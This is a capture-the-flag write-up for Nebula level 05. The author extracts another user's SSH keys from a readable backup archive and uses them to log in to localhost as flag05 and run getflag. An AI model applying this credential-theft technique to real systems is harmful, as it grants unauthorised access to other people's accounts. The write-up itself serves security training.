So going forward to the Nebula 05, we now have to find some sort of weak permissions somewhere to escalate from level05 to flag05. In searching through the flag05 home directory, I saw a “.backup” folder containing a copy of the user’s old ssh keys. I extracted the archive to the level05 user’s directory, so they could be used.

level05@nebula:/home/flag05$ cd .backup
level05@nebula:/home/flag05/.backup$ tar -xzvf backup-19072011.tgz -C /home/level05

Once that was setup, I simply tried to SSH back to the local machine but using the flag05 user, since I had their authentication keys. Luckily it was secured only with keys, and not a password as well. This let me right in.

level05@nebula:/home/flag05/.backup$ ssh flag05@localhost
The authenticity of host 'localhost (' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/

For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).

Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

* Documentation:
Last login: Fri Dec  2 04:36:54 2011 from localhost
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

After getting in, I ran the “getflag” command, in case it does store the results somewhere.